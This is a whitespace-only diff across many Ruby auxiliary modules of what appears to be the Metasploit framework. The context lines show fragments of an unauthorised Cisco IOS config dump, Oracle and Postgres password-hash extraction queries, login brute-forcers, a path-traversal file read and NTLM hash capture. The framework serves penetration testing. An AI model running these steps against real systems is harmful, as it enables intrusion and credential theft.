'method' => 'GET'
|
||||
|
@ -94,9 +94,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -15,13 +15,13 @@ require 'msf/core'
|
|||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
||||
# Include Cisco utility methods
|
||||
include Msf::Auxiliary::Cisco
|
||||
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
16.upto(99) do |level|
|
||||
res = send_request_cgi({
|
||||
'uri' => "/level/#{level}/exec/show/version/CR",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
|
||||
|
||||
if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/
|
||||
print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")
|
||||
|
||||
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => "/level/#{level}/exec/show/config/CR",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
|
||||
|
||||
if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi
|
||||
config = $2.strip
|
||||
print_good("#{rhost}:#{rport} Processing the configuration file...")
|
||||
|
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
|
||||
end
|
||||
|
||||
|
||||
break
|
||||
end
|
||||
end
|
||||
|
|
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}"
|
||||
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
|
||||
out = "Adobe ColdFusion 8"
|
||||
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
|
||||
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
|
||||
response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
|
||||
out = "Adobe ColdFusion 9"
|
||||
elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
|
||||
|
|
|
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'~',
|
||||
''
|
||||
]
|
||||
|
||||
|
||||
conn = false
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
dm = datastore['NoDetailMessages']
|
||||
|
||||
|
||||
|
||||
|
||||
extensions << datastore['EXT']
|
||||
|
||||
|
@ -104,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
|
||||
queue << testf.strip
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Detect error code
|
||||
#
|
||||
|
|
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
|
||||
# banner (ex: Sun Java System Application Server 9.x)
|
||||
|
@ -224,7 +224,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
edition, version, banner = get_version(res)
|
||||
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{datastore['PATH'].to_s}"
|
||||
print_status("#{target_url} - GlassFish - Attempting authentication")
|
||||
|
||||
|
||||
if (version == '2.x' or version == '9.x' or version == '3.0')
|
||||
try_glassfish_auth_bypass(version)
|
||||
end
|
||||
|
|
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def find_auth_uri_and_scheme
|
||||
|
||||
|
||||
path_and_scheme = []
|
||||
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
|
||||
paths = [datastore['AUTH_URI']]
|
||||
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
/Management.asp
|
||||
}
|
||||
end
|
||||
|
||||
|
||||
paths.each do |path|
|
||||
res = send_request_cgi({
|
||||
'uri' => path,
|
||||
|
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "")
|
||||
print_error("You need need to set AUTH_URI when using PUT Method !")
|
||||
return
|
||||
|
@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
success = false
|
||||
proof = ""
|
||||
|
||||
|
||||
ret = do_http_login(user,pass,@scheme)
|
||||
return :abort if ret == :abort
|
||||
if ret == :success
|
||||
|
@ -264,7 +264,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
return :fail
|
||||
end
|
||||
|
||||
|
||||
def do_http_auth_digest(user,pass,requesttype)
|
||||
path = datastore['AUTH_URI'] || "/"
|
||||
begin
|
||||
|
@ -284,14 +284,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
#'DigestAuthIIS' => false,
|
||||
'DigestAuthUser' => user,
|
||||
'DigestAuthPassword' => pass
|
||||
}, 25)
|
||||
}, 25)
|
||||
end
|
||||
|
||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
||||
vprint_error("#{target_url} not responding")
|
||||
return :abort
|
||||
end
|
||||
|
||||
|
||||
return :abort if (res.code == 404)
|
||||
|
||||
if (res.code == 200) or (res.code == 201)
|
||||
|
|
|
@ -135,7 +135,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
|
||||
vprint_status("No filename specified. Using: #{path}")
|
||||
end
|
||||
|
||||
|
||||
#Upload file
|
||||
res = do_put(path, data)
|
||||
vprint_status("Reply: #{res.code.to_s}")
|
||||
|
|
|
@ -55,11 +55,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
return results
|
||||
end
|
||||
|
||||
|
||||
def translate(ip)
|
||||
ip.split('.')
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
result = resolve(ip)
|
||||
if result != 0
|
||||
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
elsif threatnum > 75 then
|
||||
threat = "over 1 million"
|
||||
end
|
||||
|
||||
|
||||
typenum = breakup[3]
|
||||
typestring = case typenum
|
||||
when '0' then 'Search Engine'
|
||||
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
"Unknown"
|
||||
end
|
||||
|
||||
|
||||
print_status ""
|
||||
print_status "#{ip} resloves to #{result} which means: #{typestring}"
|
||||
print_status "=> it was last seen #{lastseen} day ago and has a threat score of #{threatnum} or \'#{threat} spam messages\'"
|
||||
|
|
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'ctype' => 'text/plain',
|
||||
|
||||
}, 20)
|
||||
|
||||
|
||||
if res
|
||||
|
||||
info = http_fingerprint({ :response => res })
|
||||
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if(res.body and />(JBoss[^<]+)/.match(res.body) )
|
||||
print_error("#{rhost}:#{rport} JBoss error message: #{$1}")
|
||||
end
|
||||
|
||||
|
||||
apps = [ '/jmx-console/HtmlAdaptor',
|
||||
'/status',
|
||||
'/web-console/ServerInfo.jsp',
|
||||
|
@ -66,12 +66,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'/web-console/Invoker',
|
||||
'/invoker/JMXInvokerServlet'
|
||||
]
|
||||
|
||||
|
||||
print_status("#{rhost}:#{rport} Checking http...")
|
||||
apps.each do |app|
|
||||
check_app(app)
|
||||
end
|
||||
|
||||
|
||||
ports = {
|
||||
# 1098i, 1099, and 4444 needed to use twiddle
|
||||
1098 => 'Naming Service',
|
||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
module will attempt to download the Majordomo config.pl file.
|
||||
},
|
||||
'Author' => ['Nikolas Sotiriu'],
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '70762'],
|
||||
|
@ -87,10 +87,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')
|
||||
print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")
|
||||
|
||||
|
||||
# Transform HTML entities back to the original characters
|
||||
file_data = file_data.gsub(/\>\;/i, '>').gsub(/\<\;/i, '<').gsub(/\"\;/i, '"')
|
||||
|
||||
|
||||
store_loot("majordomo2.traversal.file", "application/octet-stream", rhost, file_data, file)
|
||||
return
|
||||
end
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptInt.new('RPORT', [ true, "The target port", 443]),
|
||||
OptString.new('VERSION', [ true, "OWA VERSION (2003, 2007, or 2010)", '2007'])
|
||||
], self.class)
|
||||
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('AD_DOMAIN', [ false, "Optional AD domain to prepend to usernames", '']),
|
||||
|
|
|
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
begin
|
||||
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => tpath,
|
||||
|
|
|
@ -13,7 +13,7 @@ require 'msf/core'
|
|||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
|
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("There was an error reading the MySQL User Table")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
this_service = report_service(
|
||||
:host => datastore['RHOST'],
|
||||
:port => datastore['RPORT'],
|
||||
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
next if row[0]== "test"
|
||||
mysql_schema[row[0]]= get_tbl_names(row[0])
|
||||
end
|
||||
end
|
||||
end
|
||||
report_other_data(mysql_schema)
|
||||
end
|
||||
|
||||
|
|
|
@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
|
||||
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def verbose; datastore['VERBOSE']; end
|
||||
|
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
elsif (version == 10)
|
||||
postrequest = "username=#{user}&password=#{pass}&connectID=#{sid}&report=&script=&dynamic=&type=&action=&variables=&event=login"
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'version' => '1.1',
|
||||
|
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("Unexpected Response of: #{res.code}")#''
|
||||
return :abort
|
||||
end
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionError => e
|
||||
vprint_error("#{msg} - #{e}")
|
||||
return :abort
|
||||
|
|
|
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def hostport
|
||||
[target_host,rport].join(":")
|
||||
end
|
||||
|
||||
|
||||
def uri
|
||||
datastore['URI'] || "/isqlplus/"
|
||||
end
|
||||
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error "#{msg} Cannot connect"
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e
|
||||
print_error e.message
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def get_oracle_version(ip)
|
||||
|
|
|
@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
include Msf::Exploit::ORACLE
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Oracle Password Hashdump',
|
||||
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => %Q{
|
||||
This module dumps the usernames and password hashes
|
||||
from Oracle given the proper Credentials and SID.
|
||||
These are then stored as loot for later cracking.
|
||||
These are then stored as loot for later cracking.
|
||||
},
|
||||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
'License' => MSF_LICENSE
|
||||
|
@ -34,23 +34,23 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
return if not check_dependencies
|
||||
|
||||
|
||||
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
|
||||
#Also, 11g uses SHA-1 while 8g-10g use DES
|
||||
is_11g=false
|
||||
query = 'select * from v$version'
|
||||
ver = prepare_exec(query)
|
||||
|
||||
|
||||
if ver.nil?
|
||||
print_error("An Error has occured, check your OPTIONS")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
unless ver.empty?
|
||||
if ver[0].include?('11g')
|
||||
is_11g=true
|
||||
print_status("Server is running 11g, using newer methods...")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
this_service = report_service(
|
||||
|
@ -59,14 +59,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:name => 'oracle',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'Oracle Server Hashes',
|
||||
'Ident' => 1,
|
||||
'Columns' => ['Username', 'Hash']
|
||||
)
|
||||
)
|
||||
|
||||
#Get the usernames and hashes for 8g-10g
|
||||
begin
|
||||
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
tbl << row
|
||||
end
|
||||
end
|
||||
#Get the usernames and hashes for 11g
|
||||
#Get the usernames and hashes for 11g
|
||||
else
|
||||
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
|
||||
results= prepare_exec(query)
|
||||
|
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
tbl << row
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
rescue => e
|
||||
print_error("An error occured. The supplied credentials may not have proper privs")
|
||||
|
@ -99,14 +99,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
print_status("Hash table :\n #{tbl}")
|
||||
report_hashes(tbl.to_csv, is_11g, ip, this_service)
|
||||
|
||||
|
||||
schema= get_schema()
|
||||
unless schema.nil? or schema.empty?
|
||||
report_other_data(schema,ip)
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def get_schema
|
||||
#Grabs the Database and table names for storage
|
||||
#These names will be sued later to seed wordlists for cracking
|
||||
|
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
schema[db]= tables
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
return schema
|
||||
end
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'URL', 'http://www.oracle.com/us/products/database/index.html' ],
|
||||
[ 'CVE', '1999-0502'], # Weak password CVE
|
||||
[ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']
|
||||
[ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']
|
||||
],
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def sid
|
||||
datastore['SID'].to_s
|
||||
end
|
||||
|
||||
|
||||
def nmap_build_args(credpath)
|
||||
nmap_reset_args
|
||||
nmap_append_arg "-P0"
|
||||
|
|
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("POP3 server does not appear to be running")
|
||||
return :abort
|
||||
end
|
||||
|
||||
|
||||
vprint_status("#{target} - Trying user:'#{user}' with password:'#{pass}'")
|
||||
cmd = "USER #{user}\r\n"
|
||||
pop3_send(cmd,!@connected)
|
||||
|
|
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module extracts the usernames and encrypted password
|
||||
hashes from a Postgres server and stores them for later cracking.
|
||||
hashes from a Postgres server and stores them for later cracking.
|
||||
},
|
||||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
'License' => MSF_LICENSE
|
||||
|
@ -34,14 +34,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptString.new('DATABASE', [ true, 'The database to authenticate against', 'postgres']),
|
||||
])
|
||||
deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
#Query the Postgres Shadow table for username and password hashes and report them
|
||||
res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
|
||||
|
||||
|
||||
#Error handling routine here, borrowed heavily from todb
|
||||
case res.keys[0]
|
||||
when :conn_error
|
||||
|
@ -59,21 +59,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
when :complete
|
||||
print_status("Query appears to have run successfully")
|
||||
end
|
||||
|
||||
|
||||
this_service = report_service(
|
||||
:host => datastore['RHOST'],
|
||||
:port => datastore['RPORT'],
|
||||
:name => 'postgres',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'Postgres Server Hashes',
|
||||
'Ident' => 1,
|
||||
'Columns' => ['Username', 'Hash']
|
||||
)
|
||||
|
||||
|
||||
|
||||
|
||||
res[:complete].rows.each do |row|
|
||||
next if row[0].nil? or row[1].nil?
|
||||
|
@ -93,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_postgreshashes.txt"
|
||||
path = store_loot("postgres.hashes", "text/plain", datastore['RHOST'], hashtable, filename, "Postgres Hashes",service)
|
||||
print_status("Hash Table has been saved: #{path}")
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -63,7 +63,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
verbose = datastore['VERBOSE']
|
||||
print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
|
||||
success = false
|
||||
|
||||
|
||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
||||
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
|
||||
xs = 'http://www.w3.org/2001/XMLSchema'
|
||||
|
|
|
@ -138,10 +138,10 @@ class Metasploit4 < Msf::Auxiliary
|
|||
:data => {:proto => "soap", :users => users},
|
||||
:update => :unique_data
|
||||
)
|
||||
|
||||
|
||||
users.each do |output|
|
||||
print_good("#{rhost}:#{rport} [SAP] Extracted User: #{output[0]}")
|
||||
end
|
||||
end
|
||||
return
|
||||
elsif fault
|
||||
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
|
||||
|
|
|
@ -136,11 +136,11 @@ class Metasploit4 < Msf::Auxiliary
|
|||
:data => {:proto => "soap", :env => env},
|
||||
:update => :unique_data
|
||||
)
|
||||
|
||||
|
||||
env.each do |output|
|
||||
print_status("#{output[0]}")
|
||||
end
|
||||
|
||||
|
||||
elsif fault
|
||||
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
|
||||
return
|
||||
|
|
|
@ -97,7 +97,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><filename>' + "#{datastore['RFILE']}" + '</filename></' + ns1 + '>' + "\r\n"
|
||||
data << '</SOAP-ENV:Body>' + "\r\n"
|
||||
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
|
||||
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => "/#{datastore['URI']}",
|
||||
|
|
|
@ -161,7 +161,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
saptbl << [ output[0], output[1], output[2] ]
|
||||
end
|
||||
|
||||
print(saptbl.to_s)
|
||||
print(saptbl.to_s)
|
||||
return
|
||||
|
||||
elsif fault
|
||||
|
|
|
@ -149,7 +149,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
print_status("#{output[0]}")
|
||||
end
|
||||
|
||||
|
||||
|
||||
elsif fault
|
||||
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
|
||||
return
|
||||
|
|
|
@ -49,11 +49,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'SPECIAL',
|
||||
'TEMPORARY'
|
||||
]
|
||||
|
||||
|
||||
if val > (stypes.length - 1)
|
||||
return 'UNKNOWN'
|
||||
end
|
||||
|
||||
|
||||
stypes[val]
|
||||
end
|
||||
|
||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
result = try_user_pass(user.downcase, pass)
|
||||
if result == :next_user
|
||||
print_status("Username is case insensitive")
|
||||
user = user.downcase
|
||||
user = user.downcase
|
||||
end
|
||||
end
|
||||
report_creds(user,pass)
|
||||
|
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def report_creds(user,pass)
|
||||
|
||||
|
||||
report_hash = {
|
||||
:host => rhost,
|
||||
:port => datastore['RPORT'],
|
||||
|
|
|
@ -170,7 +170,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (@coderesult == '501') && @domain.split(".").count > 2
|
||||
print_error "#{target} - MX domain failure for #{@domain}, trying #{@domain.split(/\./).slice(-2,2).join(".")}"
|
||||
cmd = 'MAIL FROM:' + " root@" + @domain.split(/\./).slice(-2,2).join(".") + "\r\n"
|
||||
smtp_send(cmd,!@connected)
|
||||
smtp_send(cmd,!@connected)
|
||||
if (@coderesult == '501')
|
||||
print_error "#{target} - MX domain failure for #{@domain.split(/\./).slice(-2,2).join(".")}"
|
||||
return :abort
|
||||
|
@ -178,7 +178,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
elsif (@coderesult == '501')
|
||||
print_error "#{target} - MX domain failure for #{@domain}"
|
||||
return :abort
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def do_rcpt_enum(user)
|
||||
|
|
|
@ -45,20 +45,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Start the TFTP Server
|
||||
#
|
||||
def setup
|
||||
|
||||
|
||||
@path = datastore['SOURCE']
|
||||
@filename = @path.split(/[\/\\]/)[-1] #/
|
||||
|
||||
|
||||
# Setup is called only once
|
||||
print_status("Starting TFTP server...")
|
||||
@tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
|
||||
|
||||
|
||||
# Register our file name and data
|
||||
::File.open(@path, "rb") do |fd|
|
||||
buff = fd.read(fd.stat.size)
|
||||
@tftp.register_file(@filename, buff)
|
||||
end
|
||||
|
||||
|
||||
@tftp.start
|
||||
add_socket(@tftp.sock)
|
||||
|
||||
|
|
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:type => 'snmp.users',
|
||||
:data => @users
|
||||
)
|
||||
|
||||
|
||||
|
||||
rescue ::SNMP::UnsupportedVersion
|
||||
rescue ::SNMP::RequestTimeout
|
||||
|
|
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
parse_reply(r)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
idx += 1
|
||||
|
||||
end
|
||||
|
@ -245,10 +245,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if(pkt[1] =~ /^::ffff:/)
|
||||
pkt[1] = pkt[1].sub(/^::ffff:/, '')
|
||||
end
|
||||
|
||||
|
||||
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
|
||||
return if not asn
|
||||
|
||||
|
||||
snmp_error = asn.value[0].value rescue nil
|
||||
snmp_comm = asn.value[1].value rescue nil
|
||||
snmp_data = asn.value[2].value[3].value[0] rescue nil
|
||||
|
@ -260,7 +260,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
inf = snmp_info
|
||||
com = snmp_comm
|
||||
|
||||
|
||||
if(com)
|
||||
@found[pkt[1]]||={}
|
||||
if(not @found[pkt[1]][com])
|
||||
|
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
}
|
||||
print_good("#{ip} Found Users: #{@users.uniq.sort.join(", ")} ")
|
||||
|
||||
|
||||
@users.each do |user|
|
||||
report_note(
|
||||
:host => rhost,
|
||||
|
@ -70,4 +70,4 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
info = "#{proto_from_fullname} #{user}:#{pass} (#{ip}:#{port})"
|
||||
s = start_session(self, info, merge_me, false, conn.lsock)
|
||||
|
||||
|
||||
# Set the session platform
|
||||
case proof
|
||||
when /Linux/
|
||||
|
|
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
server_thread = framework.threads.spawn("Module(#{self.refname})-Listener", false) { upnp_client_listener }
|
||||
|
||||
# TODO: Test to see if this scheme will work when pivoted.
|
||||
|
||||
|
||||
# Create an unbound UDP socket if no CHOST is specified, otherwise
|
||||
# create a UDP socket bound to CHOST (in order to avail of pivoting)
|
||||
udp_send_sock = Rex::Socket::Udp.create(
|
||||
|
@ -153,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
usn_string = $1
|
||||
info << usn_string.to_s.strip
|
||||
end
|
||||
|
||||
|
||||
report_service(
|
||||
:host => addr,
|
||||
:port => port,
|
||||
|
|
|
@ -35,11 +35,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
targets = crack_phone_ranges(datastore['TARGETS'].split(","))
|
||||
connect
|
||||
|
||||
|
||||
::FileUtils.mkdir_p( datastore['OUTPUT_PATH'] )
|
||||
|
||||
|
||||
targets.each do |number|
|
||||
|
||||
|
||||
c = create_call
|
||||
begin
|
||||
::Timeout.timeout( datastore['CALL_TIME'] ) do
|
||||
|
@ -60,9 +60,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ensure
|
||||
c.hangup rescue nil
|
||||
end
|
||||
|
||||
|
||||
print_status(" COMPLETED Number: #{number} State: #{c.state} Frames: #{c.audio_buff.length} DTMF: '#{c.dtmf}'")
|
||||
|
||||
|
||||
if c.audio_buff.length > 0
|
||||
opath = ::File.join( datastore['OUTPUT_PATH'], "#{number}.raw" )
|
||||
cnt = 0
|
||||
|
@ -77,5 +77,5 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Next call
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
prints the names of all exploit modules that would be used by
|
||||
the WebServer action given the current MATCH and EXCLUDE
|
||||
options.
|
||||
|
||||
|
||||
Also adds a 'list' command which is the same as running with
|
||||
ACTION=list.
|
||||
},
|
||||
|
|
|
@ -208,7 +208,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
user = arg[:user]
|
||||
host = arg[:host]
|
||||
ip = arg[:ip]
|
||||
|
||||
|
||||
unless @previous_lm_hash == lm_hash and @previous_ntlm_hash == nt_hash then
|
||||
|
||||
@previous_lm_hash = lm_hash
|
||||
|
@ -268,7 +268,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# Display messages
|
||||
domain = Rex::Text::to_ascii(domain)
|
||||
user = Rex::Text::to_ascii(user)
|
||||
user = Rex::Text::to_ascii(user)
|
||||
|
||||
capturedtime = Time.now.to_s
|
||||
case ntlm_ver
|
||||
|
|
|
@ -488,7 +488,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
lm_chall_message = lm_cli_challenge
|
||||
end
|
||||
|
||||
|
||||
|
||||
# Display messages
|
||||
if esn
|
||||
smb[:username] = Rex::Text::to_ascii(smb[:username])
|
||||
|
|
|
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
pwd = ::File.join(datastore['FTPROOT'], @state[c][:cwd])
|
||||
buf = ''
|
||||
|
||||
|
||||
begin
|
||||
Dir.new(pwd).entries.each do |ent|
|
||||
path = ::File.join(datastore['FTPROOT'], ent)
|
||||
|
